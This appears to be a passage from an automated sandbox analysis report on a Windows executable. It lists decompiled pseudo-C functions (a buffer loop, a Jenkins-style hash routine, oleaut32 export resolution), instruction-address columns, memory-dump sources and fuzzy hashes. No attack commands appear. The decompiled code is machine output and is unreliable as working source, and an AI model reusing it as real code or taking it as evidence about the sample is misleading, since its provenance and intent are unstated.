					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00425294( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}
























































                                                                                    0x004255e8
                                                                                    0x004255eb
                                                                                    0x004255ee
                                                                                    0x004255f9
                                                                                    0x004255fc
                                                                                    0x0042560d
                                                                                    0x0042561e
                                                                                    0x00425626
                                                                                    0x0042562f
                                                                                    0x00425635
                                                                                    0x0042563b
                                                                                    0x00425644
                                                                                    0x0042564d
                                                                                    0x00425656
                                                                                    0x0042565f
                                                                                    0x00425668
                                                                                    0x00425671
                                                                                    0x0042567a
                                                                                    0x00425683
                                                                                    0x00425689
                                                                                    0x00425692
                                                                                    0x00425698
                                                                                    0x004256a1
                                                                                    0x004256af
                                                                                    0x004256b5
                                                                                    0x004256bb
                                                                                    0x00000000
                                                                                    0x004256bd
                                                                                    0x004256c4
                                                                                    0x004256c8
                                                                                    0x004256cd
                                                                                    0x004256d0
                                                                                    0x004256dd
                                                                                    0x004256dd
                                                                                    0x004256e0
                                                                                    0x004256e4
                                                                                    0x00425785
                                                                                    0x0042578e
                                                                                    0x004257c3
                                                                                    0x004257c3
                                                                                    0x004257c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004257cc
                                                                                    0x004257cf
                                                                                    0x00425795
                                                                                    0x00425797
                                                                                    0x0042579a
                                                                                    0x0042579c
                                                                                    0x0042579c
                                                                                    0x0042579c
                                                                                    0x004257a9
                                                                                    0x004257aa
                                                                                    0x004257b0
                                                                                    0x004257b2
                                                                                    0x004257b5
                                                                                    0x004257b8
                                                                                    0x004257b9
                                                                                    0x004257bc
                                                                                    0x004257be
                                                                                    0x004257be
                                                                                    0x004257be
                                                                                    0x004257c0
                                                                                    0x004257c0
                                                                                    0x004257c0
                                                                                    0x00000000
                                                                                    0x004257c0
                                                                                    0x00000000
                                                                                    0x004257cf
                                                                                    0x004257d1
                                                                                    0x004257d3
                                                                                    0x004257eb
                                                                                    0x004257d5
                                                                                    0x004257df
                                                                                    0x004257df
                                                                                    0x004257f0
                                                                                    0x004257f2
                                                                                    0x004257f5
                                                                                    0x004257f8
                                                                                    0x004257f8
                                                                                    0x00425801
                                                                                    0x00425807
                                                                                    0x0042580a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425810
                                                                                    0x00425810
                                                                                    0x00425819
                                                                                    0x0042581c
                                                                                    0x00425820
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0042582a
                                                                                    0x0042582e
                                                                                    0x00425851
                                                                                    0x00425856
                                                                                    0x00425858
                                                                                    0x00425931
                                                                                    0x00425936
                                                                                    0x00425937
                                                                                    0x00425a77
                                                                                    0x00425a7d
                                                                                    0x00425a80
                                                                                    0x00425a83
                                                                                    0x00425a86
                                                                                    0x00425a8f
                                                                                    0x00425a88
                                                                                    0x00425a88
                                                                                    0x00425a88
                                                                                    0x00425a94
                                                                                    0x00425aac
                                                                                    0x00425aaf
                                                                                    0x00425ab5
                                                                                    0x00425ab9
                                                                                    0x00425ac0
                                                                                    0x00425abb
                                                                                    0x00425abb
                                                                                    0x00425abb
                                                                                    0x00425adc
                                                                                    0x00425adf
                                                                                    0x00425ae3
                                                                                    0x00425b5c
                                                                                    0x00425ae5
                                                                                    0x00425aeb
                                                                                    0x00425aee
                                                                                    0x00425afa
                                                                                    0x00425afc
                                                                                    0x00425b00
                                                                                    0x00425b36
                                                                                    0x00425b58
                                                                                    0x00425b02
                                                                                    0x00425b26
                                                                                    0x00425b26
                                                                                    0x00425b00
                                                                                    0x00425b5f
                                                                                    0x00425b5f
                                                                                    0x00425b60
                                                                                    0x00425b6b
                                                                                    0x00425b6b
                                                                                    0x00425b6f
                                                                                    0x00425b72
                                                                                    0x00425b84
                                                                                    0x00425b87
                                                                                    0x00425b94
                                                                                    0x00425b89
                                                                                    0x00425b8c
                                                                                    0x00425b8c
                                                                                    0x00425b97
                                                                                    0x00425b99
                                                                                    0x00425b9b
                                                                                    0x00425b9e
                                                                                    0x00425ba0
                                                                                    0x00425ba0
                                                                                    0x00425ba0
                                                                                    0x00425ba9
                                                                                    0x00425bb2
                                                                                    0x00425bb5
                                                                                    0x00425bb6
                                                                                    0x00425bb9
                                                                                    0x00425bbb
                                                                                    0x00425bbb
                                                                                    0x00425bbb
                                                                                    0x00425bbd
                                                                                    0x00425bc6
                                                                                    0x00425bc8
                                                                                    0x00425bcb
                                                                                    0x00425bce
                                                                                    0x00425bd2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425bd7
                                                                                    0x00425bda
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425bda
                                                                                    0x00425bdc
                                                                                    0x00425bdf
                                                                                    0x00425be2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425be2
                                                                                    0x00000000
                                                                                    0x00425b62
                                                                                    0x00425b62
                                                                                    0x00000000
                                                                                    0x00425b62
                                                                                    0x00425b60
                                                                                    0x0042594f
                                                                                    0x00425954
                                                                                    0x00425956
                                                                                    0x00425a06
                                                                                    0x00425a08
                                                                                    0x00425a26
                                                                                    0x00425a28
                                                                                    0x00425a2f
                                                                                    0x00425a35
                                                                                    0x00425a2a
                                                                                    0x00425a2a
                                                                                    0x00425a2a
                                                                                    0x00425a3b
                                                                                    0x00425a0a
                                                                                    0x00425a0a
                                                                                    0x00425a0a
                                                                                    0x00425a3e
                                                                                    0x00425a41
                                                                                    0x00425a43
                                                                                    0x00425a59
                                                                                    0x00425a5c
                                                                                    0x00425a5f
                                                                                    0x00425a68
                                                                                    0x00425a61
                                                                                    0x00425a61
                                                                                    0x00425a61
                                                                                    0x00425a6d
                                                                                    0x00000000
                                                                                    0x00425a6d
                                                                                    0x0042597d
                                                                                    0x0042597f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425985
                                                                                    0x00425989
                                                                                    0x00425995
                                                                                    0x00425998
                                                                                    0x004259a1
                                                                                    0x0042599a
                                                                                    0x0042599a
                                                                                    0x0042599a
                                                                                    0x004259a6
                                                                                    0x004259aa
                                                                                    0x004259ac
                                                                                    0x004259af
                                                                                    0x004259b1
                                                                                    0x004259b1
                                                                                    0x004259b1
                                                                                    0x004259ba
                                                                                    0x004259c3
                                                                                    0x004259c6
                                                                                    0x004259c7
                                                                                    0x004259ca
                                                                                    0x004259cc
                                                                                    0x004259cc
                                                                                    0x004259cc
                                                                                    0x004259d4
                                                                                    0x004259d6
                                                                                    0x004259dc
                                                                                    0x004259df
                                                                                    0x004259e5
                                                                                    0x004259e5
                                                                                    0x00000000
                                                                                    0x004259df
                                                                                    0x00000000
                                                                                    0x0042598b
                                                                                    0x00425888
                                                                                    0x0042588d
                                                                                    0x00425890
                                                                                    0x004258d1
                                                                                    0x00425892
                                                                                    0x00425896
                                                                                    0x0042589c
                                                                                    0x0042589f
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258b0
                                                                                    0x004258c1
                                                                                    0x004258c1
                                                                                    0x004258da
                                                                                    0x004258dc
                                                                                    0x004258df
                                                                                    0x004258e5
                                                                                    0x004258e8
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258f3
                                                                                    0x004258f6
                                                                                    0x004258f7
                                                                                    0x004258fa
                                                                                    0x004258fc
                                                                                    0x004258fc
                                                                                    0x004258fc
                                                                                    0x004258fe
                                                                                    0x00425901
                                                                                    0x0042590a
                                                                                    0x0042590d
                                                                                    0x00425917
                                                                                    0x0042590f
                                                                                    0x0042590f
                                                                                    0x0042590f
                                                                                    0x00425903
                                                                                    0x00425903
                                                                                    0x00425903
                                                                                    0x00000000
                                                                                    0x00425901
                                                                                    0x00000000
                                                                                    0x00425830
                                                                                    0x00000000
                                                                                    0x00425822
                                                                                    0x00425be8
                                                                                    0x00425bee
                                                                                    0x00425bf7
                                                                                    0x00425bfd
                                                                                    0x00425c09
                                                                                    0x00425c12
                                                                                    0x00425c18
                                                                                    0x00425c21
                                                                                    0x00425c2a
                                                                                    0x00425c33
                                                                                    0x00425c39
                                                                                    0x00425c42
                                                                                    0x00425c4b
                                                                                    0x00425c57
                                                                                    0x00425c60
                                                                                    0x00425c69
                                                                                    0x00425c6b
                                                                                    0x00000000
                                                                                    0x00425c6b
                                                                                    0x00425701
                                                                                    0x00425704
                                                                                    0x0042570c
                                                                                    0x00425712
                                                                                    0x00425715
                                                                                    0x0042572e
                                                                                    0x00425735
                                                                                    0x00425738
                                                                                    0x0042573b
                                                                                    0x0042573e
                                                                                    0x00425740
                                                                                    0x00425745
                                                                                    0x00425748
                                                                                    0x00425750
                                                                                    0x00425752
                                                                                    0x0042575d
                                                                                    0x00425762
                                                                                    0x00425766
                                                                                    0x00000000
                                                                                    0x00425768
                                                                                    0x00425770
                                                                                    0x00425774
                                                                                    0x00425780
                                                                                    0x00425782
                                                                                    0x00000000
                                                                                    0x00425776
                                                                                    0x00000000
                                                                                    0x00425776
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425717
                                                                                    0x00425717
                                                                                    0x0042571a
                                                                                    0x0042571f
                                                                                    0x00425722
                                                                                    0x00425729
                                                                                    0x00425729
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                                                    • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004323DC, Relevance: .4, Instructions: 408COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
				signed int* _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				unsigned int* _t96;
				unsigned int* _t106;
				signed int* _t108;
				signed int _t109;

				_t109 = __edx;
				_v16 = __ecx;
				_v12 = __eax;
				_t106 =  &_v24;
				_t108 =  &_v28;
				_t96 =  &_v20;
				 *_t96 = __edx + 0xdeadbeef + _v16;
				 *_t106 =  *_t96;
				 *_t108 =  *_t96;
				_v8 = _v12;
				if((_v8 & 0x00000003) != 0) {
					if(__edx <= 0xc) {
						L20:
						if(_t109 > 0xc) {
							L23:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
							L24:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
							L25:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
							L26:
							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
							L27:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
							L28:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
							L29:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
							L30:
							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
							L31:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
							L32:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
							L33:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
							L34:
							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
							L35:
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
							return  *_t108;
						}
						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
							case 0:
								return  *_t108;
							case 1:
								goto L34;
							case 2:
								goto L33;
							case 3:
								goto L32;
							case 4:
								goto L31;
							case 5:
								goto L30;
							case 6:
								goto L29;
							case 7:
								goto L28;
							case 8:
								goto L27;
							case 9:
								goto L26;
							case 0xa:
								goto L25;
							case 0xb:
								goto L24;
							case 0xc:
								goto L23;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
						 *_t106 =  *_t106 +  *_t96;
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
						 *_t106 =  *_t106 +  *_t96;
						_t109 = _t109 - 0xc;
						_v8 =  &(_v8[3]);
					} while (_t109 > 0xc);
					goto L20;
				}
				if(__edx <= 0xc) {
					L3:
					if(_t109 > 0xc) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
						case 0:
							return  *_t108;
						case 1:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x000000ff;
							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
							goto L35;
						case 2:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x0000ffff;
							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
							goto L35;
						case 3:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x00ffffff;
							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
							goto L35;
						case 4:
							_v8 =  *_v8;
							 *__eax =  *__eax +  *_v8;
							goto L35;
						case 5:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 6:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 7:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 8:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 9:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xa:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xb:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xc:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							 *__ecx =  *__ecx + __edx;
							goto L35;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					 *_t96 =  *_t96 +  *_v8;
					 *_t106 =  *_t106 + _v8[1];
					 *_t108 =  *_t108 + _v8[2];
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
					 *_t106 =  *_t106 +  *_t96;
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
					 *_t106 =  *_t106 +  *_t96;
					_t109 = _t109 - 0xc;
					_v8 = _v8 + 0xc;
				} while (_t109 > 0xc);
				goto L3;
			}













                                                                                    0x004323dc
                                                                                    0x004323e5
                                                                                    0x004323e8
                                                                                    0x004323eb
                                                                                    0x004323ee
                                                                                    0x004323f1
                                                                                    0x004323ff
                                                                                    0x00432403
                                                                                    0x00432407
                                                                                    0x0043240c
                                                                                    0x00432413
                                                                                    0x0043261d
                                                                                    0x0043273d
                                                                                    0x00432740
                                                                                    0x00432784
                                                                                    0x0043278e
                                                                                    0x00432790
                                                                                    0x0043279a
                                                                                    0x0043279c
                                                                                    0x004327a6
                                                                                    0x004327a8
                                                                                    0x004327af
                                                                                    0x004327b1
                                                                                    0x004327bb
                                                                                    0x004327bd
                                                                                    0x004327c7
                                                                                    0x004327c9
                                                                                    0x004327d3
                                                                                    0x004327d5
                                                                                    0x004327dc
                                                                                    0x004327de
                                                                                    0x004327e8
                                                                                    0x004327ea
                                                                                    0x004327f4
                                                                                    0x004327f6
                                                                                    0x00432800
                                                                                    0x00432802
                                                                                    0x00432808
                                                                                    0x0043280a
                                                                                    0x0043280c
                                                                                    0x0043281a
                                                                                    0x0043281e
                                                                                    0x0043282c
                                                                                    0x00432830
                                                                                    0x0043283e
                                                                                    0x00432842
                                                                                    0x00432850
                                                                                    0x00432854
                                                                                    0x00432862
                                                                                    0x00432866
                                                                                    0x00432874
                                                                                    0x00432878
                                                                                    0x00432886
                                                                                    0x00000000
                                                                                    0x00432888
                                                                                    0x00432742
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432623
                                                                                    0x00432623
                                                                                    0x0043264d
                                                                                    0x0043267a
                                                                                    0x004326a7
                                                                                    0x004326ab
                                                                                    0x004326b9
                                                                                    0x004326bd
                                                                                    0x004326c1
                                                                                    0x004326cf
                                                                                    0x004326d3
                                                                                    0x004326d7
                                                                                    0x004326e5
                                                                                    0x004326e9
                                                                                    0x004326ed
                                                                                    0x004326fb
                                                                                    0x004326ff
                                                                                    0x00432703
                                                                                    0x00432711
                                                                                    0x00432715
                                                                                    0x00432719
                                                                                    0x00432727
                                                                                    0x0043272b
                                                                                    0x0043272d
                                                                                    0x00432730
                                                                                    0x00432734
                                                                                    0x00000000
                                                                                    0x00432623
                                                                                    0x0043241c
                                                                                    0x004324cd
                                                                                    0x004324d0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004324d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043251b
                                                                                    0x0043251d
                                                                                    0x00432523
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043252d
                                                                                    0x0043252f
                                                                                    0x00432535
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043253f
                                                                                    0x00432541
                                                                                    0x00432547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432551
                                                                                    0x00432553
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043255a
                                                                                    0x0043255f
                                                                                    0x00432561
                                                                                    0x0043256a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432571
                                                                                    0x00432576
                                                                                    0x00432578
                                                                                    0x00432581
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432588
                                                                                    0x0043258d
                                                                                    0x0043258f
                                                                                    0x00432598
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043259f
                                                                                    0x004325a4
                                                                                    0x004325a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004325b0
                                                                                    0x004325b5
                                                                                    0x004325ba
                                                                                    0x004325bc
                                                                                    0x004325c5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004325cc
                                                                                    0x004325d1
                                                                                    0x004325d6
                                                                                    0x004325d8
                                                                                    0x004325e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004325e8
                                                                                    0x004325ed
                                                                                    0x004325f2
                                                                                    0x004325f4
                                                                                    0x004325fd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432604
                                                                                    0x00432609
                                                                                    0x0043260e
                                                                                    0x00432613
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432422
                                                                                    0x00432422
                                                                                    0x00432427
                                                                                    0x0043242f
                                                                                    0x00432437
                                                                                    0x0043243b
                                                                                    0x00432449
                                                                                    0x0043244d
                                                                                    0x00432451
                                                                                    0x0043245f
                                                                                    0x00432463
                                                                                    0x00432467
                                                                                    0x00432475
                                                                                    0x00432479
                                                                                    0x0043247d
                                                                                    0x0043248b
                                                                                    0x0043248f
                                                                                    0x00432493
                                                                                    0x004324a1
                                                                                    0x004324a5
                                                                                    0x004324a9
                                                                                    0x004324b7
                                                                                    0x004324bb
                                                                                    0x004324bd
                                                                                    0x004324c0
                                                                                    0x004324c4
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                    • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                                                    • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                    • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E9C4, Relevance: .2, Instructions: 195COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                    • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                                                    • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                    • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405AE0, Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                                    • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
